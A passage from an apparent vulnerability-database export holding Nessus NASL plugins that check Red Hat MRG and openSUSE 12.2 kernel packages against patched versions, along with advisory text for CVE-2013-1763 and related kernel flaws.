reference:\"kernel-rt-firmware-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.6.11-rt30.25.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.6.11-rt30.25.el6rt\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"mrg-rt-release-3.6.11-rt30.25.el6rt\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:26:16", "description": "The Linux kernel was updated to 3.4.33 and to fix a local root\nprivilege escalation and various other security and non-security bugs.\n\nCVE-2013-1763: A out of bounds access in sock_diag could be used by\nlocal attackers to execute code in kernel context and so become root.\n\nCVE-2013-0160: The atime of /dev/ptmx is no longer updated, avoiding\nside channel attacks via user typing speed.\n\nCVE-2012-5374: Denial of service via btrfs hashes could have been used\nby local attackers to cause a compute denial of service.\n\nCVE-2013-0216: Fixed a problem in XEN netback: shutdown the ring if it\ncontains garbage.\n\nCVE-2013-0231: Fixed a problem in XEN pciback: rate limit error\nmessages from xen_pcibk_enable_msi(x).", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : kernel (openSUSE-SU-2013:0395-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0160", "CVE-2013-1763", "CVE-2013-0231", "CVE-2013-0216", "CVE-2012-5374"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", 
"p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-extra", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", 
"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "cpe:/o:novell:opensuse:12.2", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo"], "id": "OPENSUSE-2013-175.NASL", "href": "https://www.tenable.com/plugins/nessus/74913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-175.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74913);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-5374\", \"CVE-2013-0160\", \"CVE-2013-0216\", \"CVE-2013-0231\", \"CVE-2013-1763\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2013:0395-1)\");\n script_summary(english:\"Check for the openSUSE-2013-175 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Linux kernel was updated to 3.4.33 and to fix a local root\nprivilege escalation and various other security and non-security bugs.\n\nCVE-2013-1763: A out of bounds access in sock_diag could be used by\nlocal attackers to execute code in kernel context 
and so become root.\n\nCVE-2013-0160: The atime of /dev/ptmx is no longer updated, avoiding\nside channel attacks via user typing speed.\n\nCVE-2012-5374: Denial of service via btrfs hashes could have been used\nby local attackers to cause a compute denial of service.\n\nCVE-2013-0216: Fixed a problem in XEN netback: shutdown the ring if it\ncontains garbage.\n\nCVE-2013-0231: Fixed a problem in XEN pciback: rate limit error\nmessages from xen_pcibk_enable_msi(x).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=797175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=799209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=800280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=802153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=804738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=805633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-03/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", 
reference:\"kernel-default-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-vanilla-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-syms-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.4.33-2.24.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-ec2-extra-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-pae-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", 
reference:\"kernel-pae-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", 
cpu:\"x86_64\", reference:\"kernel-ec2-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.4.33-2.24.1\") ) flag++;\nif ( 